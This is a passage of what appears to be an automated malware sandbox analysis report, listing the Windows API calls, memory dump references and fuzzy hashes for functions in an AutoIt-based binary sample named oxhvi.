                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                      • String ID: 0$`$@(`$`$h$$`
                                                                                                                                                      • API String ID: 1986988660-4224800786
                                                                                                                                                      • Opcode ID: c002a14ec8d2befeebdc18c9ee5d01e4215d4969eac3072c413c727b0d1daab0
                                                                                                                                                      • Instruction ID: 96f32d21a2cf1e795159e88175cfede8bad4d8e4a2d62d6652766306997fb6b9
                                                                                                                                                      • Opcode Fuzzy Hash: c002a14ec8d2befeebdc18c9ee5d01e4215d4969eac3072c413c727b0d1daab0
                                                                                                                                                      • Instruction Fuzzy Hash: 54716CB49912038ED78ADF69ED7D6173FE2BF88304B50A12E9509C72A1EB704449CF59
                                                                                                                                                      Function 005690D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4288abb05aad6469767b8be971dfe6e4df832adc452ba7bf3dac88a4641a7cd8
                                                                                                                                                      • Instruction ID: e854c6a224681387a678ffc71570b00bcd1e7dc08b4cb05f8c24e036a2700d72
                                                                                                                                                      • Opcode Fuzzy Hash: 4288abb05aad6469767b8be971dfe6e4df832adc452ba7bf3dac88a4641a7cd8
                                                                                                                                                      • Instruction Fuzzy Hash: A4C1E670E0438A9FDF11DFA8C845BADBFB9BF5A310F144599E814AB392D7309942CB61
                                                                                                                                                      Function 0053353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00533568
                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00533589
                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 0053359D
                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 005335A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                      • Opcode ID: 9478564f332c9d2f3470ed6b06fe5860801b902c3832c82a4194f9d073758102
                                                                                                                                                      • Instruction ID: 7451804538bf998c2b7a09251a8c49a16aba4b0b3aee6d76cbe9ad4290aa92c1
                                                                                                                                                      • Opcode Fuzzy Hash: 9478564f332c9d2f3470ed6b06fe5860801b902c3832c82a4194f9d073758102
                                                                                                                                                      • Instruction Fuzzy Hash: 48F0B7716803967EEB2557176C1CF372FBEEBC6F50B00202EB904E6160D6A91855EAB0
                                                                                                                                                      Function 005355F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053561C
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053563D
                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053565F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                      • Opcode ID: cb6af3578c3cc2e43bdf2e98e3944ddf48112d59270bd946f62ec4cb3f524442
                                                                                                                                                      • Instruction ID: 7f5941a23f3227c50c18186d014bc7cac32cc5bcf5224eb89a7a1973efb2b919
                                                                                                                                                      • Opcode Fuzzy Hash: cb6af3578c3cc2e43bdf2e98e3944ddf48112d59270bd946f62ec4cb3f524442
                                                                                                                                                      • Instruction Fuzzy Hash: 3F113C75611608BFDB208F68CC45EEFBBB8FF14744F505869F805E7120E671AE45A760
                                                                                                                                                      Function 0058E71E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0058E73D
                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 0058E763
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                      • API String ID: 3013587201-2590602151
                                                                                                                                                      • Opcode ID: 437b9467baad827697a0409b5d164ac37fe1bf3c1312c9774ef500e9d2bc6e0b
                                                                                                                                                      • Instruction ID: c3ed55c6ee215b373dd00b483507f0d4d139c77732abef3198ecff8ff7ca2a40
                                                                                                                                                      • Opcode Fuzzy Hash: 437b9467baad827697a0409b5d164ac37fe1bf3c1312c9774ef500e9d2bc6e0b
                                                                                                                                                      • Instruction Fuzzy Hash: C2E0E5319016119FDF762A105C49EFA3E34BF20701B180868EC01F6150EB24CC48C398
                                                                                                                                                      Function 0059DA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,005CDC30), ref: 0059DABB
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0059DACA
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0059DAD9
                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005CDC30), ref: 0059DB36
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                      • Opcode ID: 0983bf19c5f1b0acb5d083ace8585cabfc0737d626aa7b476ecdfc3f2fee7b57
                                                                                                                                                      • Instruction ID: 3cea35516e4ee1a79e94c06b8e38085903af76d301027807d6de02a2a7a45a52
                                                                                                                                                      • Opcode Fuzzy Hash: 0983bf19c5f1b0acb5d083ace8585cabfc0737d626aa7b476ecdfc3f2fee7b57
                                                                                                                                                      • Instruction Fuzzy Hash: C02171745092059F8B10DF24C8859ABBBF4FE95364F144A1DF499C72A1D730DD4ACF62
                                                                                                                                                      Function 00533A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00574115
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                        • Part of subcall function 005339DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005339FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                      • String ID: X$`u_
                                                                                                                                                      • API String ID: 779396738-5915016
                                                                                                                                                      • Opcode ID: 0e51b311500ed54309e359e06eb1eb2762cd42d27a445e827982ee66633318b2
                                                                                                                                                      • Instruction ID: ba831eaa8ef778a0e2e3785dc3963106e17dbe73268a92a411953775f0787038
                                                                                                                                                      • Opcode Fuzzy Hash: 0e51b311500ed54309e359e06eb1eb2762cd42d27a445e827982ee66633318b2
                                                                                                                                                      • Instruction Fuzzy Hash: 73218471A0425D9BCF05DF98D849BEE7FF9BF89304F008019E505E7241DBB85A898FA1
                                                                                                                                                      Function 0055016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 005509F8
                                                                                                                                                        • Part of subcall function 00553634: RaiseException.KERNEL32(?,?,?,00550A1A,?,00000000,?,?,?,?,?,?,00550A1A,00000000,005F9758,00000000), ref: 00553694
                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00550A15
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                      • Opcode ID: b259a5c924d2cb9aa4a1ec85dc5542b064a9df58ffaabfc743f708ea45f83d9c
                                                                                                                                                      • Instruction ID: 86561a9db97b7fdb2f08f3e5b1d660706ec2bf12ee146df3cea56cddf52c22d1
                                                                                                                                                      • Opcode Fuzzy Hash: b259a5c924d2cb9aa4a1ec85dc5542b064a9df58ffaabfc743f708ea45f83d9c
                                                                                                                                                      • Instruction Fuzzy Hash: 68F0A43450070E778B05BAA4DC7A9AD7F7CBE40351B605127BD14974E2EB70DA5EC5C1
                                                                                                                                                      Function 0058E59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                      • Opcode ID: 3a2933e01cff76258eb3b33b39d70c7d30702dda174a7dff0463104e5dec0071
                                                                                                                                                      • Instruction ID: 58b4370a5684375fde7f7ef65f9b8550e84287f921a6f80f847c0bf06e2b0f60
                                                                                                                                                      • Opcode Fuzzy Hash: 3a2933e01cff76258eb3b33b39d70c7d30702dda174a7dff0463104e5dec0071
                                                                                                                                                      • Instruction Fuzzy Hash: 18D012B1C0401DD9CF90BA909C4ACBD7B7CBB18305F104C62FD06F1040F6349508A721
                                                                                                                                                      Function 005B88B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005B8C52
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 005B8C59
                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 005B8E3A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                      • Opcode ID: 65aea404124697feb1023e39ad849d2a00593889dea3f2c0d9222ebff1465bd8
                                                                                                                                                      • Instruction ID: cc1f64f1958a9222c20032d2db585efc0a0af423ef67c11bdb9323f8bdac6e1b
                                                                                                                                                      • Opcode Fuzzy Hash: 65aea404124697feb1023e39ad849d2a00593889dea3f2c0d9222ebff1465bd8
                                                                                                                                                      • Instruction Fuzzy Hash: B1125971A083419FC714DF28C485B6ABBE9FF89314F14895DE8898B392DB31ED45CB92
                                                                                                                                                      Function 00536BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00536CA1
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00536CB1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                      • Opcode ID: 44d3390101d35dfd9702b5ebe47a52dbd9f9a9b40338010b1c9bf7b8fcc5670e
                                                                                                                                                      • Instruction ID: 513ddd8e8edbf7f7ad10548b790211a56342b42d855d4034b43be3675acc9c8c
                                                                                                                                                      • Opcode Fuzzy Hash: 44d3390101d35dfd9702b5ebe47a52dbd9f9a9b40338010b1c9bf7b8fcc5670e
                                                                                                                                                      • Instruction Fuzzy Hash: 7B314C71A0060AFFDB14CF68C980B99BBB5FB44314F14C629E91997240D7B1FEA4DB90
                                                                                                                                                      Function 0054FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00535F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00536049
                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 0054FD44
                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0054FD53
                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0058FDD3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                      • Opcode ID: 56e05a8ad111728ec5af64a06a1504a81ea89c499980419779c4ca64404e90dc
                                                                                                                                                      • Instruction ID: 284cce7d51930d5a623d12ca9f92bba294342bd9a83357da3b5c86b719a355f7
                                                                                                                                                      • Opcode Fuzzy Hash: 56e05a8ad111728ec5af64a06a1504a81ea89c499980419779c4ca64404e90dc
                                                                                                                                                      • Instruction Fuzzy Hash: EC31C871905744AFEB22DF248899BD6BFECBF16308F0004AEDADDA7241C7745A84CB51
                                                                                                                                                      Function 00568A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,0056895C,?,005F9CE8,0000000C), ref: 00568A94
                                                                                                                                                      • GetLastError.KERNEL32(?,0056895C,?,005F9CE8,0000000C), ref: 00568A9E
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00568AC9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2583163307-0
                                                                                                                                                      • Opcode ID: ec4e7584c1cacaec92441a6b26fd37f04bc51a94304ac5eedb96c3ab0e81cd9e
                                                                                                                                                      • Instruction ID: 675aaac6b39746d18595c1e82b57c62e90baa601b4534b742b347d913311b1db
                                                                                                                                                      • Opcode Fuzzy Hash: ec4e7584c1cacaec92441a6b26fd37f04bc51a94304ac5eedb96c3ab0e81cd9e
                                                                                                                                                      • Instruction Fuzzy Hash: B9016B326455504AD32423B4D889B7E2F8ABBC2774F29071BFD08CB1D2EE208CC99391
                                                                                                                                                      Function 0056971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005697CA,FF8BC369,00000000,00000002,00000000), ref: 00569754
                                                                                                                                                      • GetLastError.KERNEL32(?,005697CA,FF8BC369,00000000,00000002,00000000,?,00565EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00556F61), ref: 0056975E
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00569765
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                      • Opcode ID: e40dcc376e8c50fef794322a9bcc89b87ca5f62ea347b53703265a1042450b29
                                                                                                                                                      • Instruction ID: 33f8a2ac6dcc32f4adc5e5943288551f54510d829d0fe3e8560775b9e79b7021
                                                                                                                                                      • Opcode Fuzzy Hash: e40dcc376e8c50fef794322a9bcc89b87ca5f62ea347b53703265a1042450b29
                                                                                                                                                      • Instruction Fuzzy Hash: E2012432620515AFCB059FA9DC05CAE7F2EFB86720B240319FC148B190EA309D419BA0
                                                                                                                                                      Function 00542AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00542FB6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
